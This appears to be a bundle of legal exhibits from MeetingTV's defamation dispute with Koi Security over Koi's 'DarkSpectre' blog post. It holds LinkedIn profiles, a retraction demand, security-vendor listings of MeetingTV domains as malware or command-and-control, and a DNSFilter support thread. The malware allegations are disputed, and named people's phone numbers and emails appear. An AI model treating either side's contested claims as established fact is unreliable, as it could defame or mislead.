In the meantime, if you have any questions, priorities you'd like us to cover, or concerns you want to address before we meet, hit reply and I'll make sure we come prepared.

Looking forward to our conversation!



### Amit Yampolsky

Head of Sales • **Koi Security**

+1 (215) 989-7532

Koi, 1901 Pennsylvania Avenue NW, Suite 900, Washington, DC 20006, United States

Unsubscribe Manage preferences

# EXHIBIT 4



INTERNET ARCHIVE
WayBackMachine
25 captures
30 Dec 2025 – 2 May 2026

https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers

Gal Hachamov
December 29, 2025

Oren Yomtov, Yuval Ronen
December 26, 2025

Tuval Admoni
December 21, 2025

KOI

GET A DEMO

COMPANY
About us →
Contact →
KOIDEX

PRODUCT
Platform →
Discovery →
Approve →
Policies →

**Koi Security LTD**
Yehuda Ha-Levi St 34, 6513616
Tel Aviv, Israel

**Koi Security INC**
1901 Pennsylvania Avenue NW, Suite 900
Washington D.C. 20006

hello@koi.ai

Privacy Policy →

Terms & Conditions →

SOC2    ISO    GDPR

Copyright © 2025 Koi Security Inc. All rights reserved.

Privacy        Cookie Policy

085

# EXHIBIT 5

role="listitem" class="posts_item w-dyn-item"><div class="posts_link-card"><div class="post-card_up"><div class="post-card_header"><div class="categories_wrapper w-dyn-list"><div role="list" class="categori

soc.svg" loading="lazy" alt="soc3 certified" class="image-2"/></div></div></div><div class="footer_copy"><div>Copyright © 2026 Koi Security Inc. All rights reserved.</div></div><div class="footer_bottom"><

# EXHIBIT 6

  Home  My Network  Jobs  Messaging  Notifications  Me ▾  For Business ▾  Claim 1 free mo of Premium Pa



## Amit Yampolsky · 2nd

AES Sales Lead @ Palo Alto Networks | Cybersecurity | AI-Native GTM | Forbes 30 Under 30 | Ex-Papaya Global

- Palo Alto Networks

- University of California, Berkeley

Philadelphia, Pennsylvania, United States · Contact info

**11,210** followers · **500+** connections

Follow    Message    More

## About

Enterprise sales leader and Forbes 30 Under 30 (2022). Most recently, I led sales at Koi Security, building an AI-native sales motion from scratch, scaling revenue from zero, and helping take the company through its acquisition by Palo Alto Networks in 2026. Today, I lead Agentic Endpoint Security (AES) sales ...see more

◆ **Top skills**
Artificial Intelligence (AI) · Sales · Startups · Leadership · Entrepreneurship    →

## Featured

Post

I'll probably regret asking this here (please don't flood my DMs unless you'( worth it) 😅  But I'm always trying to improve our sales tech stack, so here g

💥 Outbound
We're using Amplemarket (can't tag them – they're no longer on LinkedIn). They're great… but really expensive. Any better alternatives worth exploring

😊👍❤️ 162

## Activity
11,210 followers

➕ Follow

Posts   Comments   Videos   Images

https://www.linkedin.com/in/amityampolsky/    1/6

Amit Yampolsky 🚀 reposted this    •••

**Koi**
11,518 followers
3w · 🌐

**It's official! Koi has been acquired by Palo Alto Networks** 🧡 ...more



🔵❤️ 1,486 · 9 comments · 102 reposts





↻

➤

**Amit Yampol**
AES Sales Lead @
1mo · 🌐

Something exciting is ha

Proud to be part of the r



🔵❤️ 207 · 14 comment

---

Show all posts →

---

## Experience

**Agentic Endpoint Security (AES) Sales Lead**
Palo Alto Networks · Full-time
Apr 2026 – Present · 2 mos
Philadelphia, Pennsylvania, United States · Remote

Following Palo Alto Networks' acquisition of Koi, I've stepped into the role of Agentic Endpoint Security (AES) Sales Lead. The oppo ...see more

**VP of Sales**
Koi · Full-time
Jan 2025 – Apr 2026 · 1 yr 4 mos
Philadelphia, Pennsylvania, United States · Hybrid

As VP of Sales, I led all revenue functions at Koi, from ICP definition and commercial infrastructure to building the AE team and closing enterprise deals across Fortune 10, Fortune 100, and Fortune 500 accounts. Built Koi's AI-native sales motion from scratch, deploying AI agents to surface buyer intent, drive account-based outreach, and route leads to the right AE.
Ran a consultative enterprise sales motion across CISOs, CIOs, and security practitioners.
Partnered with Product, Engineering, and Customer Success on enterprise Proof of Value engagements. The revenue foundation we built led directly to Koi's acquisition by Palo Alto Networks in April 2026.

---

**Founder**
Independent GTM Operator · Full-time
Jul 2023 – Dec 2024 · 1 yr 6 mos
Tel Aviv District, Israel · Hybrid

Founded a GTM advisory firm helping dozens of early-stage startups (Seed to Series A) go from zero to repeatable revenue. Hands-on with...

**Papaya Global**
Full-time · 4 yrs 4 mos

**Senior Director, Enterprise Sales**
Jul 2021 – Jun 2023 · 2 yrs

Led a team of Enterprise Account Executives selling Papaya's Total Workforce offering into global multinationals. Owned pipeline...

⬡ Team Leadership

**Global Sales Director**

Oct 2020 - Jul 2021 · 10 mos

Led Papaya's first global outbound sales motion, reporting directly to the CEO as both Global Sales Director and a senior IC enterprise seller. …

**Sales Executive**

Mar 2019 - Oct 2020 · 1 yr 8 mos

Papaya's first commercial hire. Worked directly with senior leadership to stand up the company's commercial offering, defining pricing, partneri…

## Education



**University of California, Berkeley**

Bachelor's degree, Economics

2018 - 2018

Undergrad student at the BESAP which provides international students with the unique opportunity to enrich their academic and cultural…



**Reichman University**

Bachelor's degree, Economics and DataTech

2016 - 2019

Grade: Magna Cum Laude

Show all 3 educations →

## Volunteering



**Teacher**

African Impact

Jun 2016 - Jul 2016 · 2 mos

Education



**Taglit Excel Alumni Member**

Birthright Israel Excel

Jun 2018 - Present · 8 yrs

Education

Birthright Israel Excel is an elite year-long fellowship program beginning with a 10-week business internship in Israel for talented Jewish college…

## Skills

**Artificial Intelligence (AI)**

 1 endorsement

**Sales**

 1 endorsement

Show all 14 skills →

## Recommendations

**Received**    Given

**Nothing to see for now**

Recommendations that Amit receives will appear here.

091

# EXHIBIT 7

 

**Promoted** •••

**Join Vrbo as a Host**
Don't miss the opportunity to earn
extra income each month – on your

...follows Vrbo

...et, go!
...pin up your website
...flash.
...r connections also
...oDaddy

## Kuran Freyermuth  · 2nd

Director of Business Development at Clover | Design-led Product
Security | GTM Leader

- Clover Security

San Francisco Bay Area · **Contact info**

9,106 followers · **500+** connections

George Romas and **Yang Fan Yun** are mutual connections

Message   ⟳ Pending   More   **Visit my website**

🟧 Profile enhanced with Premium ▾

## About

GTM Leader focused on AI and Cybersecurity.

Passionate about driving growth and building exceptional teams.
...

...see more

◈ **Top skills**
Sales · Leadership · Go-to-Market Strategy · Revenue Operations ·
Building New Business →

## Activity
9,106 followers

✓ Following

Posts   Comments   Images

Kuran Freyermuth reposted this   •••

**Alon Kollmann** 🍀 in · 2nd
Co-Founder & CEO at Clover Security
**Visit my website**
3d · 🌐

The Agentic SDLC is producing three types of
builders your security model wasn't designed for:

1. Technical builders. Shipping 10x volume through
agents that don't know your architecture, your trust
boundaries, or your last three incidents.
2. Semi-technical builders. PMs, designers, and

**Kuran Freyer...**
Director of Busin...
**Visit my website**
1w · 🌐

After a short but sweet r...
acquisition by Palo Alto...
share that I've joined Clo...



analysts pushing code into your dev pipelines
without fully understanding how it works.
3. Citizen developers. Sales, legal, and ops  ...more



Securing the Agentic...
clover.security

Starting a

 199 · 46 commen

osts →

### Director of Business Development



Clover Security
Apr 2026 - Present · 2 mos

Catching bugs before they hatch. Design-led Product Security.
...                                                    ...see more

⬦ Threat Modeling, Secure-by-Design and +3 skills



From Reactive to Proactive: Clover Security's
Design-Led Revolution | Notable Capital

### Director of Sales Development



Koi
Dec 2025 - Apr 2026 · 5 mos

KOI was acquired by Palo Alto Networks (NASDAQ: PANW) for $400M on
February 17th, 2026....                                ...see more

⬦ Cyber Threat Intelligence (CTI), Artificial Intelligence (AI) and +5
skills



Koi Raises $48M to Reinvent Endpoint Security for
the Modern Software Stack | Koi Blog

### Grip Security



Full-time · 3 yrs 10 mos

### Director of Sales Development
Apr 2024 - Dec 2025 · 1 yr 9 mos

2025: Team achieved 102% of Quota
2024: Team achieved 118% of Quota...                   ...see more

⬦ Identity Security, AI Risk Management and +2 skills

### Manager, Sales Development
Nov 2022 - Dec 2025 · 3 yrs 2 mos

Series B - $40M led by Third Point Ventures, Intel Capital, and YL
Ventures.

⬦ Sales Enablement, Strategic Account Development and +2 skills

### Sales Development Leader
Mar 2022 - Dec 2025 · 3 yrs 10 mos
Los Angeles, California, United States

Series A - $19M led by YL Ventures.
...                                                    ...see more

⬦ New Business Development, Go-to-Market Strategy and +1 skill

094



**Guardicore**
1 yr 4 mos

**Sr. Sales Development Manager | Enterprise**
Full-time
Aug 2021 - Mar 2022 · 8 mos



ates

ai Technologies (NASDAQ: AKAM) for

raining & Development and +1 skill

uardicore for $600M

| Enterprise

Los Angeles, California, United States

Series C - $109M. Led by TPG and Battery Ventures.

⬦ Sales Prospecting, Cold Calling and +2 skills



**Crisp Imaging**
Full-time · 2 yrs

**Account Executive | Enterprise**
2019 - Dec 2020 · 2 yrs
Los Angeles Metropolitan Area

2019: President's Club

⬦ Strategic Sales, Enterprise Partnerships and +1 skill

**Account Executive | Mid-Market**
2019 - 2020 · 1 yr

⬦ Sales, Business Development and +1 skill

Show all 13 experiences →

## Education

**University of Puget Sound**
Bachelor of Arts - BA, English Language and Literature, General

Activities and societies: Merit Scholarship, Honors, DJ at KUPS 90.1 FM
The Sound, Contributor to Crossroads Literary Magazine.

⬦ Business Development, Sales Enablement and +5 skills

## Licenses & certifications



**California Motorcycle License**
California Department of Motor Vehicles



**Certified Sailor**
American Sailing
Issued Jun 2012

⬦ Navigation, Racing and +1 skill

## Volunteering

095



**English Tutor at Women's Correctional Facility**
Freedom Education Project Puget Sound

### Skills

Clover Security

Clover Security

skills →

## Recommendations

**Received**     Given

**Amit Yampolsky** 🔖 in · 2nd
AES Sales Lead @ Palo Alto Networks | Cybersecurity | AI-Native GTM | Forbes 30 Under 30 | Ex-Papaya Global
March 17, 2026, Amit managed Kuran directly

I've had the privilege of working closely with Kuran during a pivotal phase of KOI's growth, and it's no exaggeration to say that his impact has been transformative.

Kuran joined us at a critical inflection point, where scaling pipeline and building a repeatable outbound motion were essential to our success. He immediately stepped in and became an indispensable part of the team, bringing structure, urgency, and a level of strategic clarity that elevated our entire go-to-market approach.

As Director of Sales Development, Kuran didn't just manage the SDR function, he redefined it. Under his leadership, the team consistently broke records in pipeline generation and unlocked significant enterprise opportunities, including multiple engagements with Fortune 500 companies. His ability to connect execution with strategy is rare; he understands not just how to generate pipeline, but how to generate the right pipeline.

Beyond SDR leadership, Kuran played a central role in shaping our broader GTM operations. He architected and scaled a world-class account-based marketing program that ultimately drove 50% of KOI's outbound pipeline, an achievement that speaks to both his strategic thinking and operational rigor.

What sets Kuran apart is his ability to operate as a true partner to sales leadership. He is a trusted advisor with a deep understanding of enterprise solution selling, buyer psychology, and modern GTM strategy. He consistently brings thoughtful perspectives, challenges assumptions in productive ways, and ensures we're always aligned to outcomes that matter.

Any organization looking to build or scale a high-performing revenue engine would be incredibly fortunate to have Kuran leading the charge.



**Alex Langley** in · 3rd
Security and Automation for Private LTE/5G Networks
May 21, 2025, Alex worked with Kuran but on different teams

Kuran is a workhorse and was critical in developing a structured approach for the SDRs at Grip. He was directly responsible for driving some unbelievable meeting results and provided a lot of direct support and feedback for my territory. Fantastic guy and would highly recommend!!

https://www.linkedin.com/in/kuranfreyermuth/

# EXHIBIT 8

 

## Brady Nicholson 🛡 · 2nd
Enterprise Sales @Truffle Security



- Truffle Security Co.



- Gonzaga University

San Diego, California, United States · **Contact info**

**500+** connections

Sarah Ward is a mutual connection

Message    🕐 Pending    More    **View my services**

🟨 Profile enhanced with Premium ▾

## About

I help organizations transform security from a manual bottleneck into a continuous, automated advantage.

Currently, as an Enterprise Account Executive at Truffle Security, I par ...see more

## Services

I love helping people thrive! I empower professionals with personalized Career Development Coaching, Negotiation, and Interview Preparation. I also ...see more

**Career Development Coaching • Training • Resume Review • Negotiation • Interview Preparation**

Show all services →

## Activity
4,110 followers

Posts    Comments    Images

**Brady Nicholson** 🔵 · 2nd
Enterprise Sales @Truffle Security
**View my services**
4d · 🌐

The Journey Continues from Koi to Truffle Security.

I am thrilled to share the next chapter of ...more

098

Brady Nicholson repos

**Koi**
11,500 followers
2mo · 🌐

How many software inst your developer environm many of them carry risk



 71 · 10 comments

63 · 5 comments





Show all posts →

## Experience

**Enterprise Account Executive**
Truffle Security Co.
Apr 2026 - Present · 2 mos

**Enterprise Account Executive**
Koi · Full-time
Dec 2025 - Present · 6 mos
San Diego, California, United States · Remote

Series A → Acquired by Palo Alto Networks
… …see more

**Enterprise Account Executive**
BreachLock, Inc. · Full-time
Feb 2025 - Jan 2026 · 1 yr
San Diego, California, United States

- 102% of 2025 Quota



**Enterprise Account Executive**
Strata Identity · Full-time
Dec 2021 - Feb 2025 · 3 yrs 3 mos
San Diego, California, United States

Recruited by OneLogin VP of Sales → CRO
… …see more



**Account Executive**
OneLogin by One Identity · Full-time
Oct 2020 - Dec 2021 · 1 yr 3 mos
San Francisco, California, United States

Series A → Acquired by Quest Software
… …see more

Show all 9 experiences →

## Education



**Gonzaga University**
Economics, Liberal Arts and Sciences/Liberal Studies
2012 - 2016

## Skills

**Upselling**

099

Endorsed by 1 person in the last 6 months

 1 endorsement

---

**Lead Qualification**

Endorsed by 1 person in the last 6 months

 1 endorsement

---

Show all 35 skills →

---

## Recommendations

**Received**      Given

**Amit Yampolsky** 🎖 in · 2nd
AES Sales Lead @ Palo Alto Networks | Cybersecurity | AI-Native GTM | Forbes 30 Under 30 | Ex-Papaya Global
March 19, 2026, Amit managed Brady directly

I've had the opportunity to work closely with Brady and can confidently say he's one of the most effective and thoughtful professionals I've partnered with. He brings a rare combination of strategic thinking and execution, and it's had a clear impact on our team's success.

What impressed me early on was his ability to quickly understand our customers, identify where we could create real value, and turn that into tangible pipeline almost immediately.

From a revenue standpoint, Brady has been a standout performer, generating over $3M in pipeline and directly contributing to meaningful closed revenue. He also drove the fastest closed-won deal in company history, which speaks to his ability to create urgency and move deals forward without cutting corners.

What I appreciate most about Brady is how he operates. He's able to move quickly while still being intentional, whether he's driving key initiatives, working cross-functionally, or stepping in when things get high pressure.

He's also someone people genuinely enjoy working with. He's communicative, accountable, and consistently goes above and beyond for both teammates and customers. I'd recommend him without hesitation to any team looking for someone who can both lead and execute at a high level.

---

**ian Singh** in · 2nd
Sales | identity security
April 4, 2025, ian worked with Brady on the same team

I'd work with Brady just about anywhere. We were the first inside reps at Strata and built much of that motion together. His energy is infectious and our brainstorming sessions always yielded valuable ideas and tactics.
He is dedicated and creative, which you don't find in the field very often.

---

Show all 5 received →

---

## Organizations

**Kappa Sigma Fraternity**
Sep 2013 - Present

---

## Interests

**Top Voices**      Companies      Groups      Newsletters      Schools

100

# EXHIBIT 9

From: **Amit Assaraf** <amit@koi.ai>
Date: Thu, Feb 12, 2026 at 5:40 AM
Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: Michael Robertson <mr@michaelrobertson.com>

Hey Michael,

I missed your email, let me look into this, we did not mean to cause any harm and I'll make sure to fix this asap internally.

Best,

---

**Amit Assaraf**
CEO • **Koi**
+972 50 596 4411 | +1 646 351 9882



Sent via Superhuman

On Thu, Feb 12, 2026 at 3:27 PM, Michael Robertson <mr@michaelrobertson.com> wrote:
 Amit,

 Wanted to make sure you saw this demand regarding this ultra serious issue. The blog post your company did talking about my company MeetingTV was false and defamatory and did considerable damage which is increasing every day.

 -- mr

 WebinarTV.us - World's Best Webinars
 +18583446911

 ---------- Forwarded message ---------
 From: **Michael Robertson** <mr@michaelrobertson.com>
 Date: Wed, Feb 11, 2026, 5:46 PM
 Subject: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025

To: <hello@koi.ai>

Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025

To Whom It May Concern:

On December 30, 2025, Koi AI authored and published an article titled:
"DarkSpectre: Unmasking the Threat Actor Behind 7.8 Million Infected Browsers."
The article falsely states and/or implies, among other things, that MeetingTV:
Is affiliated with a criminal Chinese organization
Acts in concert with ShadyPanda and DarkSpectre
Shares infrastructure with malicious actors
Shares data with Chinese entities
Works with extensions that connect to infinitynewtab

These allegations are false. MeetingTV has never had any relationship — past or present — with any such entities. No data was ever shared with any third party.

The article was published without contacting MeetingTV for verification.

As a direct result of your publication:
DNSFilter and other vendors have categorized MeetingTV as malware.
ISPs and network security companies have blocked traffic.
MeetingTV has suffered substantial economic damage.

This letter constitutes a formal demand for:
Immediate removal of the publication.

Publication of a full retraction;
Written confirmation within 7 days.
Preservation of all documents (litigation hold).

Failure to comply will result in immediate filing of a lawsuit seeking compensatory and punitive damages exceeding ███████.

Nothing herein waives any rights.

- Michael Robertson
CEO, MeetingTV

# EXHIBIT 10

fortiguard.com/webfilter

 **FortiGuard Labs**

Research    Services    Threat Intelligence    Support    Resources    About

**FURTINET**

▶ Home / Web Filter

 **Web Filter Lookup**

**At a glance:**

Review the Web Filter Categories

**WF Rating History**

*Dec 31, 2025 @ 06:22:09 PST*

added as **Malicious Websites**

 **DOWNLOAD FORTICLIENT**

webinarstvus.cloudfuncti 🔍

7.0 +  ⌄

Submit a URL to check its Rating

FortiOS Version

**Category:** Malicious Websites

Sites that host software that is covertly downloaded to a user's machine to collect information and monitor user activity, and sites that are infected with destructive or malicious software, specifically designed to damage, disrupt, attack or manipulate computer systems without the user's consent, such as virus or trojan horse.

**Risk Level:** High Risk

Strong confidence of malicious intent.

**Group:** Security Risk

Click here to see if this category is currently blocked.

Request a Review

## Latest Web Filter Databases 236.14175

Protect your organization by blocking access to malicious, hacked, or inappropriate websites with



fortiguard.com/webfilter



Research    Services    Threat Intelligence    Support    Resources    About    FÜRTINET

▶ Home / Web Filter



**At a glance:**

Review the Web Filter Categories

**WF Rating History**

*Dec 31, 2025 @ 00:27:11 PST*

added as **Malicious Websites**

[ DOWNLOAD FORTICLIENT ]

 # Web Filter Lookup

zoocorder.firebaseio.com 🔍    7.0 +  ⌄

Submit a URL to check its Rating    FortiOS Version

**Category:** Malicious Websites

Sites that host software that is covertly downloaded to a user's machine to collect information and monitor user activity, and sites that are infected with destructive or malicious software, specifically designed to damage, disrupt, attack or manipulate computer systems without the user's consent, such as virus or trojan horse.

**Risk Level:** High Risk

Strong confidence of malicious intent.

**Group:** Security Risk

Click here to see if this category is currently blocked.

Request a Review

## Latest Web Filter Databases 236.14175

Protect your organization by blocking access to malicious, hacked, or inappropriate websites with



# EXHIBIT 11



losintelligence.com/reputation_center/lookup?search=zoocorder.firebaseio.com

Lookup data results for **Hostname**

zoocorder.firebaseio.com

IP & Domain Reputation Overview | Email & Spam Trends

## OWNER DETAILS

| | |
|---|---|
| **DOMAIN** | googleusercontent.com |
| **HOSTNAME** | zoocorder.firebaseio.com |
| **NETWORK OWNER** | GOOGLE INC. |

## CONTENT DETAILS

| | |
|---|---|
| **CONTENT CATEGORY** | Cloud and Data Centers |

Think these category details are incorrect?

🏷 Submit Content Categorization Ticket

## REPUTATION DETAILS

**WEB REPUTATION** ↑ Favorable

⊕ Submit Web Reputation Ticket

## EMAIL VOLUME DATA

| | LAST DAY | LAST MONTH |
|---|---|---|
| **EMAIL VOLUME** | 0 | 0 |
| **VOLUME CHANGE** | 0% | |

## BLOCK LISTS

**TALOS SECURITY INTELLIGENCE BLOCK LIST**

| | |
|---|---|
| **ADDED TO BLOCK LIST** | Yes |
| **CLASSIFICATION** | Malicious |
| **FIRST SEEN** | 2026-01-01T22:14:13 UTC |
| **EXPIRATION DATE** | 2026-05-06T21:13:16 UTC |
| **STATUS** | ACTIVE |



# EXHIBIT 12



urlfiltering.paloaltonetworks.com/query/



Products   Solutions   Services   Partners   Company   More

Demos and Trials

Home / Test A Site

# Test A Site

Log in

**Important Update: Login Required for Category Change Requests Starting March 15, 2026**

As of March 15, 2026, a login is required for all URL category change requests submitted through Test A Site. This change helps improve security and prevent misuse.

Note: This requirement applies only to category change requests. URL category lookups will continue to be available without login.

🆕 Don't have an account? Create one for free

Enter a domain or URL into the search engine to view details about its current URL categories. To request recategorization of this website, click Request Change below the search results.

URL   Enter a URL   SEARCH

URL: webinarstvus.cloudfunctions.net

**Categories**: Malware

**Category**: Malware

**Description**: Sites containing or known to host malicious content, executables, scripts, viruses, trojans, and code

**Example Sites**:

113

Home / Test A Site

# *Test A Site*

Log in

**Important Update: Login Required for Category Change Requests Starting March 15, 2026**

As of March 15, 2026, a login is required for all URL category change requests submitted through Test A Site. This change helps improve security and prevent misuse.

Note: This requirement applies only to category change requests. URL category lookups will continue to be available without login.

 Don't have an account? Create one for free

Enter a domain or URL into the search engine to view details about its current URL categories. To request recategorization of this website, click Request Change below the search results.

| URL | Enter a URL | SEARCH |
| --- | --- | --- |

**URL**: zoocorder.firebaseio.com

**Categories**: Command-and-Control

**Category**: Command-and-Control

**Description**: Command-and-control URLs and domains used by malware and/or compromised systems to surreptitiously communicate with an attacker's remote server to receive malicious commands or exfiltrate data

**Example Sites**:

Request Change

All Tags...        All Tags...        PANW        Apr 17, 2026 at 8:41 AM

Proof-of-Delivery-Koi-Inc.pdf        Mar 24, 2026 at 9:27 AM        12 KB        Tags

# EXHIBIT 13

radar.cloudflare.com/scan/741fe652-6fcc-4bbd-a85e-f7c6563e45d1/summary



116

# EXHIBIT 14

spectrum.net/sup...    Work

**Spectrum**

# This Site Is Currently Blocked By Security Shield

Security Shield blocks access to potentially harmful websites that are used to spread malware or steal user data.

Use the form below to request a website that is currently blocked to be reviewed for possible unblocking.

## Account Information

**Requested URL:** meetingtv.us

* indicates required field

First Name *

Last Name *

Email Address *

Additional Comments (Optional)

# EXHIBIT 15



Michael Robertson <mr@michaelrobertson.com>

## [DNSFilter] Re: Domain threat report: meetingtv[.]us

5 messages

**Will Strafach (Support)** <notifications@dnsfilter.com>                    Wed, Feb 4, 2026 at 2:34 PM
Reply-To: Support <notifications@dnsfilter.com>
To: Mr <mr@michaelrobertson.com>

Your ticket (229638) has been updated. To add additional comments, reply to this email.



**Will Strafach** (DNSFilter)
Feb 4, 2026, 17:34 EST

Hi,

See here:

https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
https://www.virustotal.com/gui/domain/meetingtv.us/detection

Our categories simply reflect public data.



**Mr**
Feb 4, 2026, 16:05 EST



## Support email

A customer has submitted the following threat report. Details:

domain: meetingtv[.]us

user: Michael Robertson
email: mr@michaelrobertson.com
org name: Created for mr@michaelrobertson.com
org ID: 10196607
current categories: Malicious Lite(79), Malware(66), Suspicious & Deceptive(83)

Issue Type: Suspected False Positive
Notes:
I'm CEO of MeetingTV.us. You are defaming us saying we are malicious, malware, suspicious and deceptive. We are none of those things. We are a reputable search engine for free and public webinars. We are registered with the US Copyright Office. We abide by the DMCA (digital millennium copyright act). We have nearly 200,000 webinars and partner with some of the largest universities, non-profits and corporations in the world. We demand you remove these false statements. You can reach me with any follow up questions at mr@michaelrobertson.com Thanks.

[MXK012-6WMLV]

**Support** <notifications@dnsfilter.com>                                    Mon, Feb 9, 2026 at 2:01 PM
Reply-To: Support <notifications@dnsfilter.com>

To: Mr <mr@michaelrobertson.com>

This is an automated email from the support team regarding ticket #229638.

---

HI!

We're just wondering if you've had a chance to review the latest update from Will?

Will is expecting some additional information from you to proceed with this ticket. If you'd like to provide an update, or require more time to work through our latest comment, simply reply to this email or go to help.dnsfilter.com/hc/requests/229638 and let us know.

Otherwise, if we don't hear back from you, we'll close this ticket for you in the next few days.

Thanks,
DNSFilter Support

[MXK012-6WMLV]

**Michael Robertson** <mr@michaelrobertson.com>                          Tue, Feb 10, 2026 at 10:39 AM
To: Support <notifications@dnsfilter.com>

Will, thanks for the response to correct the record.

Response to:
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
This blog post is full of false allegations and the researcher did not research. They never spoke with us even though we are easy to find and respond to email. We don't hide our identity.

Our business is building a search engine for free and public webinars. Just like books.google.com makes a searchable database of all books, we do the same for webinars. We try to support the popular webinar services - there are many. There are 180,000 webinars in the catalog. You can browse the catalog at WebinarTV.us.

We don't "collect corporate intelligence" or track participant lists. We are a search engine for free and public webinars published for the whole world to watch. The author seems confused about private meetings and public webinars. Public webinars are open to the whole world and publicly publish their title, description and speakers.

Part of the service is a recommendation system, "If you like this, then try this." - just like Amazon and many other services offer. This requires examining what webinars people are registering for to create the recommendation. The is listed as a feature in the extension description. I'm attaching a screenshot circling and underlining where this is disclosed.

There's many wild allegations in this post, but we have zero connection with Shadypanda, InfinityNewTab, DarkSpectre. We have no idea what those are and have no formal or informal connection with any of them.

The researcher says Twitter X Downloader communicates with InfinityNewtab. That is false. It does not. He presents no evidence to support this claim. No screenshot of code. No reference at all. It's simply not true.

He also says, "By systematically collecting meeting links, participant lists, and corporate intelligence across 2.2 million users, DarkSpectre has created a database that could power large-scale impersonation operations - providing attackers with credentials to join confidential calls, participant lists to know who to impersonate, and context to make those impersonations convincing."

They may have a database or not we don't know, but they didn't get one bit of data from MeetingTV. First, off we don't have that data and secondly, we have no connection to them and never have. As I mentioned we have zero connection with DarkSpectre. We don't know who they are.

The bottom part of this flimsy report speculates about corporate espionage and sales intelligence. It sounds sensational - great spy novel stuff, but he presents zero evidence to support it.

We don't do any of that because we're a search engine for <u>free and public webinars</u>. I'm happy to give you any additional information you might need or answer any questions to rebut this erroneous report.

-- mr
[Quoted text hidden]



**Screenshot of Chrome Audio Capture Description from Chrome Web Store.png**
546K

---

**Michael Robertson** <mr@michaelrobertson.com>                    Tue, Feb 10, 2026 at 3:27 PM
To: Sam Hammer <sam@meetingtv.us>

I sent this

-- mr

WebinarTV.us - World's Best Webinars
[Quoted text hidden]



**Screenshot of Chrome Audio Capture Description from Chrome Web Store.png**
546K

---

**Will Strafach (Support)** <notifications@dnsfilter.com>                    Wed, Feb 11, 2026 at 1:41 PM
Reply-To: Support <notifications@dnsfilter.com>
To: Mr <mr@michaelrobertson.com>


Your ticket (229638) has been updated. To add additional comments, reply to this email.



**Will Strafach** (DNSFilter)
Feb 11, 2026, 16:41 EST

I appreciate your point but on our end, we serve B2B clients who expect us to block public IOCs like this, especially with all the VirusTotal hits. In my position there is unfortunately nothing I can do about the category in DNSF's system, because it reflects what our customers expect. I might recommend sorting this out with the author as that will probably cause the VirusTotal hits to be cleared.



**Mr**
Feb 10, 2026, 13:39 EST

Will, thanks for the response to correct the record.

Response to:
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
This blog post is full of false allegations and the researcher did not research. They never spoke with us even though we are easy to find and respond to email. We don't hide our identity.

Our business is building a search engine for free and public webinars. Just like books.google.com makes a searchable database of all books, we do the same for webinars. We try to support the popular webinar services - there are many. There are 180,000 webinars in the catalog. You can browse the catalog at WebinarTV.us.

We don't "collect corporate intelligence" or track participant lists. We are a search engine for free and public webinars published for the whole world to watch. The author seems confused about private meetings and public webinars. Public webinars are open to the whole world and publicly publish their title, description and speakers.

Part of the service is a recommendation system, "If you like this, then try this." - just like Amazon and many other services offer. This requires examining what webinars people are registering for to create the recommendation. The is listed as a feature in the extension description. I'm attaching a screenshot circling and underlining where this is disclosed.

There's many wild allegations in this post, but we have zero connection with Shadypanda, InfinityNewTab, DarkSpectre. We have no idea what those are and have no formal or informal connection with any of them.

The researcher says Twitter X Downloader communicates with InfinityNewtab. That is false. It does not. He presents no evidence to support this claim. No screenshot of code. No reference at all. It's simply not true.

He also says, "By systematically collecting meeting links, participant lists, and corporate intelligence across 2.2 million users, DarkSpectre has created a database that could power large-scale impersonation operations - providing attackers with credentials to join confidential calls, participant lists to know who to impersonate, and context to make those impersonations convincing."

They may have a database or not we don't know, but they didn't get one bit of data from MeetingTV. First,

off we don't have that data and secondly, we have no connection to them and never have. As I mentioned we have zero connection with DarkSpectre. We don't know who they are.

The bottom part of this flimsy report speculates about corporate espionage and sales intelligence. It sounds sensational - great spy novel stuff, but he presents zero evidence to support it.

We don't do any of that because we're a search engine for <u>free and public webinars</u>. I'm happy to give you any additional information you might need or answer any questions to rebut this erroneous report.

-- mr

Attachment(s)
Screenshot of Chrome Audio Capture Description from Chrome Web Store.png

---



**Will Strafach** (DNSFilter)
Feb 4, 2026, 17:34 EST

Hi,

See here:
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
https://www.virustotal.com/gui/domain/meetingtv.us/detection

Our categories simply reflect public data.

---



**Mr**
Feb 4, 2026, 16:05 EST



## Support email

A customer has submitted the following threat report. Details:

domain: meetingtv[.]us

user: Michael Robertson
email: mr@michaelrobertson.com
org name: Created for mr@michaelrobertson.com
org ID: 10196607
current categories: Malicious Lite(79), Malware(66), Suspicious & Deceptive(83)

Issue Type: Suspected False Positive
Notes:
I'm CEO of MeetingTV.us. You are defaming us saying we are malicious, malware, suspicious and deceptive. We are none of those things. We are a reputable search engine for free and public webinars. We are registered with the US Copyright Office. We abide by the DMCA (digital millennium copyright act). We have nearly 200,000 webinars and partner with some of the largest universities, non-profits and corporations in the world. We demand you remove these false statements. You can reach me with any follow up questions at mr@michaelrobertson.com Thanks.

[MXK012-6WMLV]

# EXHIBIT 16



Get our weekly newsletter that 321K+ startup teams read

Add your email

Subscribe

# Why NFX Invested in Koi Security: The Future of App-Layer Security, Scaling at Hyperspeed

Gigi Levy-Weiss  ·  @gigilevy

Sep 2025  ·  Cybersecurity

  



# EXHIBIT 17

## Examples of Sales Language Included With Reports From **Koi.ai** Blog

1) We built Koi to catch exactly this kind of attack. Static analysis alone can't stop a postinstall hook that decodes its strings at runtime and deletes itself after execution. You need behavioral analysis - sandboxed execution that watches what packages actually do when they run. That's what Wings does, and it's why our customers had both versions blocked before most of the ecosystem even knew something was wrong.

Trusted by Fortune 50 organizations and some of the world's largest tech companies, Koi provides real-time risk scoring and governance across package ecosystems including npm, PyPI, VS Code extensions, Chrome extensions, and beyond.

Book a demo to see how Koi catches the attacks that slip past traditional security tools.

https://www.koi.ai/blog/axios-compromised-a-supply-chain-attack-on-npms-most-popular-http-client

